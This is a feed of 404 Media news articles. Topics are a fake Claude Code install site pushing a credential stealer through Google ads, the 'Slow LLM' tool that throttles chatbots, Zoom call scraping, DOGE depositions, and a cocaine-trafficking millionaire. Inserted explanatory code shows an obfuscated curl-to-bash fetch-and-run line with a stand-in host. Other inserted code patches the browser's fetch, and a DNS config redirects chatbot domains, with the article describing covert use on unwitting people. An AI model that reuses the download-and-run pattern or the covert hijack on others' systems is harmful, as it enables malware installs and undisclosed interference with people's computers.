404 Media

A journalist-founded digital media company exploring the ways technology is shaping, and is shaped by, our world.

A Top Google Search Result for Claude Plugins Was Planted by Hackers

2026-03-24 21:35:37

A top result on Google for people searching for Claude plugins sent users to a site that recently contained malicious code in an apparent attempt to steal their credentials. 

The news shows how the explosion of interest in generative AI tools is giving hackers new ways to attack users.

The malicious site was flagged to us by a 404 Media reader who was using Claude. 

“I was googling to troubleshoot how to get my Claude Code CLI to authenticate its github plugin to my Github account and may have stumbled upon a malicious site hosted on Squarespace of all places,” the reader, Dan Foley, told me in an email. 

Foley searched for “github plugin claude code” and the top result was a sponsored ad for a Squarespace site with the title “Install Claude Code - Claude Code Docs.”

When he clicked through, he saw a site that was pretending to be the official site for Anthropic’s Claude with identical design and branding.

The phony Anthropic help site had swapped some of the Claude Code installation instructions for others, Foley pointed out. That included a line users could paste into their terminal to allegedly install the software on a Mac. The command included an obfuscated URL, hiding what its real destination was. When Foley decoded it, he found it downloaded software from another site entirely. 
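The article does not publish the actual command Foley found, so the following is only an illustrative sketch: one common obfuscation trick is to base64-encode the real download URL inside an otherwise normal-looking install one-liner, which a cautious user can decode before running anything. The encoded string and the `evil.example.com` domain below are invented stand-ins.

```typescript
// Illustrative only: the real command and destination were not published,
// so this encoded string and evil.example.com are made up.
// A typical obfuscated installer looks something like:
//   /bin/bash -c "$(curl -fsSL $(echo aHR0...c2g= | base64 -d))"
// Decoding the base64 string reveals the true download host.

function decodeObfuscatedUrl(encoded: string): string {
  // atob() decodes base64 to a string (available in browsers and Node 16+)
  return atob(encoded);
}

const suspicious = "aHR0cHM6Ly9ldmlsLmV4YW1wbGUuY29tL2luc3RhbGwuc2g=";
console.log(decodeObfuscatedUrl(suspicious));
// The decoded host is not anthropic.com or claude.ai, a red flag that the
// installer is fetching software from somewhere else entirely.
```

Decoding a string like this before pasting a command into a terminal is exactly the check that exposed the fake site.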

ThreatFox, a platform for sharing known instances of malware, recently flagged that domain as distributing a “stealer,” a type of malware that steals users’ credentials. ThreatFox linked the domain to the stealer as recently as a few days ago.

Google’s ad center listed the advertiser behind the malicious sponsored search result as “Enhancv R&D,” which is based in Bulgaria, according to a screenshot of the advertiser profile Foley shared with 404 Media. The advertiser was also listed as being verified by Google, meaning they had to complete an identity verification process which requires legal documentation of their name and location. 

Foley said he flagged the ad to Google, which removed the site from search results. The URL which pointed to the potential stealer is no longer online. 

“We removed this ad and suspended the account for violating our policies,” a Google spokesperson told me in an email. Google said it has strict policies against ads that aim to phish information or distribute malware, and that it uses a combination of Gemini-powered tools and human review to enforce these policies at scale. Google claims the vast majority of these ads are caught before they ever run.

Malicious links in paid Google ads impersonating legitimate websites are not a problem unique to AI. Hackers often try to get users to click malicious links by pretending to be whatever is popular on the internet at any given moment, be it a pirated movie or video game just before release, or celebrity sex tapes. The fact that hackers are targeting Claude users reflects the growing popularity of AI tools, and the hackers’ hope that users are not careful enough to check what they’re clicking when using them.

In January, we wrote about how hackers could similarly target users of the AI agent tool OpenClaw by boosting instructions for AI agents that contained a backdoor for hackers.

This Company Is Secretly Turning Your Zoom Meetings into AI Podcasts

2026-03-24 21:00:13

WebinarTV, a company that bills itself as “a search engine for the best webinars,” is secretly scanning the internet for Zoom meeting links, recording the calls, and turning them into AI-generated podcasts for profit. In some cases, people only found out that their Zoom calls were recorded once WebinarTV reached out to them directly to say their call was turned into a podcast in an attempt to promote WebinarTV’s services. 

WebinarTV claims to host more than 200,000 webinars. It’s not clear how it’s recording so many Zoom calls without permission, but in some cases the stolen videos posted to WebinarTV can put call participants at risk. 

Judge Allows DOGE Deposition Videos Back Online

2026-03-24 04:28:37

On Monday a judge said videos of recent depositions from DOGE members can be published online once again. The ruling is something of an about-face for Judge Colleen McMahon, who originally ordered plaintiffs in the DOGE-related lawsuit to “claw back” the videos they had published to YouTube. The videos were already massively viral at the time of that ruling, in part because they showed DOGE members Justin Fox and Nate Cavanaugh unable or unwilling to define DEI, and admitting they used ChatGPT to filter contracts to potentially axe based on words like “Black” and “homosexual” but not “white.” The depositions were also broadly one of the first times the public had directly heard from people inside DOGE.

“This decision validates our position that the publication of the videos, which document a process to destroy knowledge and access to vital public programs, was indeed in the public’s interest,” Joy Connolly, president of the American Council of Learned Societies, said in a statement shared with 404 Media. “We look forward to continuing the pursuit of justice in reclaiming government support for important humanities research, education, and sustainability initiatives.”

This Web Tool Sabotages AI Chatbots By Making Them Really, Really Slow

2026-03-23 23:20:26

Watching people outsource their critical thinking, emotions, and sanity to glitchy “AI” chatbots has been one of the most uniquely terrifying aspects of being a human being in recent years. 

While wealthy tech evangelists like Sam Altman continue to make wild proclamations about how large language models (LLMs) are destined to do our jobs and raise our children, critics have compared Silicon Valley’s attempts to force dependence on chatbots to a mass-enfeebling event—an attempt to convince people that they are actually better off having machines think, act, and create for them.

Now, there’s a new way to discourage friends, family, and even complete strangers from turning to chatbots like Claude and ChatGPT: by using a tool called “Slow LLM” to make them really, reaaaaalllyyy slowwwww. Or at least, making them look that way.

“Are you concerned that you or your loved ones might be participating in a massive de-skilling event? Experiencing LLM-induced psychosis? Outsourcing cognitive and emotional functions to autocomplete? Install SLOW LLM on your computer, or the computer of a loved one, today!” reads a description on the tool’s website.

Created by artist Sam Lavigne, Slow LLM causes anyone accessing AI chatbots on a computer or network to encounter mysterious, painfully slow response times. It works by exploiting a quirk of JavaScript to rewrite the browser’s built-in “fetch” function, which returns data to the page. When a user visits a chatbot domain and enters a query, the modified fetch function stretches the response over an excruciatingly long period of time. The result is that the user perceives the LLM to be running slowly, when in reality it’s simply being arbitrarily metered by Lavigne’s code.
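Lavigne’s actual code is on his GitHub; as a rough sketch of the technique the article describes, overriding the global fetch and re-wrapping the response body with an artificial per-chunk delay looks something like this. The host list, delay value, and the `shouldThrottle` helper are all illustrative, not Lavigne’s real implementation.

```typescript
// Sketch of the fetch-patching idea; Slow LLM's real code lives on
// Lavigne's GitHub, so the host list and delay here are illustrative.
const SLOW_HOSTS = ["claude.ai", "chatgpt.com"];
const DELAY_MS = 250; // artificial pause added before every chunk

function shouldThrottle(url: string): boolean {
  return SLOW_HOSTS.includes(new URL(url).hostname);
}

const realFetch = globalThis.fetch.bind(globalThis);

(globalThis as any).fetch = async (
  input: RequestInfo | URL,
  init?: RequestInit
): Promise<Response> => {
  const url =
    typeof input === "string" ? input : input instanceof URL ? input.href : input.url;
  const resp = await realFetch(input, init);
  if (!shouldThrottle(url) || !resp.body) return resp;

  // Re-wrap the body so each chunk arrives after an extra delay: the model
  // answers at full speed, but the reply trickles into the page.
  const reader = resp.body.getReader();
  const slowed = new ReadableStream({
    async pull(controller) {
      await new Promise((r) => setTimeout(r, DELAY_MS));
      const { done, value } = await reader.read();
      if (done) controller.close();
      else controller.enqueue(value);
    },
  });
  return new Response(slowed, { status: resp.status, headers: resp.headers });
};
```

Because only the delivery of the response is metered, the chatbot itself never knows anything happened, which is why the slowdown looks like a server-side problem.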

Lavigne says that the idea for the project came after seeing how deeply some of his students and acquaintances had come to rely on generative tools to do basic tasks.

“So many people are starting to use these tools to outsource their cognitive and emotional functions, and in the process of doing this they’re forgetting all these basic things that they’ve learned how to do,” Lavigne told 404 Media. “I think that the more people rely on LLMs, the more extreme this de-skilling event will become.”

Slow LLM can be installed as a Chrome browser extension, but it can also be deployed network-wide via an “Enterprise Edition,” a DNS service that causes everyone on a home, school, or corporate network to experience slow chatbot responses. This is done by simply changing the DNS server on your router to Lavigne’s custom domain—though he warns that using a random person’s DNS is generally not a great idea cybersecurity-wise, and recommends the safer option of hosting your own DNS server to deploy the Slow LLM code, which he has released for free on GitHub. The browser extension currently only affects Claude and ChatGPT, while the DNS version also slows down Grok and Google Gemini.
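The self-hosted version of that idea can be sketched as a resolver override: answer DNS queries for chatbot domains with the address of a machine running the throttling code. This is a minimal sketch assuming a dnsmasq resolver, and 192.168.1.50 is a made-up local address, not part of Lavigne’s release.

```shell
# Illustrative dnsmasq config fragment: resolve chatbot domains to a local
# proxy machine (192.168.1.50 is invented) that serves the slowed responses.
address=/claude.ai/192.168.1.50
address=/chatgpt.com/192.168.1.50
address=/gemini.google.com/192.168.1.50
address=/grok.com/192.168.1.50
```

Pointing the router’s DNS at the resolver then slows every device on the network without installing anything on them.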

“The idea was that these things are removing friction, so let’s add some friction back in,” said Lavigne, using the engineering term frequently used by tech bros to describe inefficiencies in a system. He argues that LLM chatbots have taken this idea of “friction” to an extreme, presenting any unpleasantness or difficulty we encounter as something that should be outsourced to Silicon Valley’s thinking machines—even if overcoming that difficulty is part of what makes human creativity meaningful and worthwhile. “Anything that removes the friction of something that’s difficult, it makes you not learn, and it removes the learning you’ve already achieved.”

In theory, one could activate Slow LLM without anyone noticing; most people would likely assume that chatbot providers like Google and OpenAI are having technical issues, which does happen without outside interference from time to time. Lavigne says that so far, he hasn’t heard from anyone who has successfully deployed Slow LLM on a work or school network. But he certainly isn’t discouraging people from trying.

“I have not yet tested it on any unwitting subjects, but I’m thinking about it,” Lavigne said in a mischievous tone, adding that it would be an interesting experiment to see how people react when presented with artificially-slow chatbots. “Maybe they’ll just rage-quit LLMs.”

Slow LLM is the latest addition to a series of impish tech provocations that Lavigne has become known for. During the height of the pandemic Zoompocalypse in 2021, he released “Zoom Escaper,” a tool that floods your Zoom audio stream with annoying echoes, distortions, and interruptions until your presence becomes unbearable to others. In 2018, he infamously scraped public LinkedIn profiles to build a massive database of ICE agents, which was subsequently removed from platforms like GitHub and Medium. Lavigne’s frequent collaborator Tega Brain has also released browser tools like “Slop Evader,” which filters out generative AI slop by removing all search results from after November 2022, when ChatGPT was first released to the public.

“I’ve been doing these little experiments in digital sabotage where I’m trying to make these tools that mildly interrupt computational systems,” said Lavigne. “One of the things I’ve been thinking about is how if the means of production is truly in our hands, and it’s also the way we’re communicating with other people and managing our social life, then what does it mean to interrupt productivity?”

Lavigne is not an absolutist, however. Without prompting, he admitted that he used Claude to help write some of the code for Slow LLM—until, of course, Slow LLM started working and forced him to complete the project on his own. Lavigne says he’s trying to make people question the habits they are forming by regularly using chatbots, tools which tempt us to essentially entrust all our knowledge, decision-making, and emotional well-being to massive companies run by tech billionaires like Altman and Elon Musk.

“My hope is to get people to think a little bit more about their usage of these tools,” said Lavigne. “But the broader thing I want people to think about […] is ways of interrupting these flows of data, these flows of power, and putting friction into these computational systems that are mediating so many parts of our lives.”

Ridicule as Praxis (with Emily Bender and Alex Hanna)

2026-03-23 21:37:56

This week, Sam talks to Emily Bender and Alex Hanna about the marketing ploys of “artificial intelligence,” why ridicule works to keep big tech’s claims in check, and what makes them hopeful for the future. They’re the authors of The AI Con: How to Fight Big Tech’s Hype and Create the Future We Want.

Dr. Alex Hanna is a writer and sociologist of technology, labor, and politics. She’s the Director of Research at the Distributed AI Research Institute (DAIR) and a Lecturer in the School of Information at the University of California, Berkeley. Dr. Emily M. Bender is a Professor of Linguistics at the University of Washington, where she is also the Faculty Director of the Computational Linguistics Master of Science program and affiliate faculty in the School of Computer Science and Engineering and the Information School.

They also host the Mystery AI Hype Theater 3000 podcast, which “deflates AI hype and draws attention to the real harms of the automation technologies we call ‘artificial intelligence’.”

Listen to the weekly podcast on Apple Podcasts, Spotify, or YouTube. Become a paid subscriber for access to this episode's bonus content and to power our journalism. If you become a paid subscriber, check your inbox for an email from our podcast host Transistor for a link to the subscribers-only version! You can also add that subscribers feed to your podcast app of choice and never miss an episode that way. The email should also contain the subscribers-only unlisted YouTube link for the extended video version too. It will also be in the show notes in your podcast player.

Flood of AI-Generated Submissions ‘Final Straw’ for Small 22-Year-Old Publisher

The AI Con

Emily’s cartoon 

"Questioning the Normalization of Surveillance" by the Center on Privacy & Technology at Georgetown

"You Are Not a Parrot" at NY Mag

An Adrenaline Junkie Millionaire’s Quest to Become a Cocaine Kingpin

2026-03-23 21:00:14

The British de Havilland DH-112 Venom is one of the most iconic combat jets of the Cold War, with a distinctive two-pronged tail design that stretched out far behind the main body of the aircraft and a striking red and black paint job. It also gained a reputation for handling issues at high speeds. And yet, that was the aircraft 50-year-old Marty Tibbitts flew one summer afternoon at a Wisconsin air show in July 2018.

Tibbitts, a millionaire who made his money launching call center businesses, regularly flew, and bought, historical aircraft like the Venom. He ran the World Heritage Air Museum in his home state of Michigan, which housed his collection of around a dozen planes.

Seated in the Venom’s cockpit, Tibbitts maneuvered the plane along the runway behind another aircraft. The first plane took off. About eight seconds later, two seconds sooner than he was supposed to, Tibbitts pulled the Venom’s stick back and brought his craft into the air.

Immediately something was wrong. People on the ground saw the Venom’s wings rock back and forth shortly after its sluggish takeoff, a sign that it might be caught in the wake of the first plane. One video showed the Venom starting to make a shallow left turn as the plane’s engine sound decreased and then rapidly increased. Black smoke billowed. The plane stalled. The aircraft barely reached 200 feet before it started to descend with its nose still pointed upwards.

💡
Do you know anything else about Marty Tibbitts or Ylli Didani? I would love to hear from you. Using a non-work device, you can message me securely on Signal at joseph.404 or send me an email at [email protected].

Tibbitts crashed into a nearby barn, which had two other people inside. Flames engulfed the plane and set the barn and other nearby buildings on fire too.

“We got a plane down!” a man yelled in a 911 call. “Building’s on fire!” Tibbitts died in the crash.

A day later Tibbitts’ brother, JC, gave a statement to local media: “Our family is devastated by the loss of Marty. To say he was passionate about all things in his life—family, business and aviation would be to immensely understate the case. He died pursuing one of his passions,” it read. “Beyond his family, friends and business associates, many will miss this unique and special person.”

As news of Tibbitts’ death spread, his wife received a phone call from one of those business associates. He was crying on the other end of the line. “It can’t be true, it can’t be true,” the man said.

A screenshot of a U.S. court record including photos of Didani.

The man in tears on the phone was Ylli Didani, a now convicted cocaine trafficker who orchestrated massive shipments of drugs into the UK and multiple European ports. Tibbitts, it turned out, had a secret life. Without the knowledge of his family, Tibbitts worked closely with Didani to become an aspiring international drug lord. The pair commissioned the construction of an elaborate underwater drone that would be stuffed with cocaine and latch onto ships with magnets. Tibbitts was the money and brains behind the operation, funding the submarine’s design and development. In messages with Didani, he referred to himself as Tony Stark, the alter ego of the millionaire inventor and superhero Iron Man. According to investigators, Didani’s cocaine trafficking business was worth tens of millions of dollars. Didani had now lost his business partner and friend.

Extensive interviews with Didani, including over the email system of the prison where he is currently incarcerated, and thousands of pages of court transcripts reviewed by 404 Media reveal the story of a millionaire who, even with his massive fortune, wanted more and more. Tibbitts wanted to pillage Egyptian tombs for artifacts, and become an ambassador to Albania. He allegedly invested in a company making flying cars, tried to source Black Hawk helicopters to sell to other countries, and arranged a massive load of cash to be flown on his private jet to buy bulk cocaine. Tibbitts, who was at one point a primary target during the investigation into the cocaine group’s operations, left a gaping question with his death: why did he do it? Why did the man who had everything lead a secret double life as an international drug kingpin?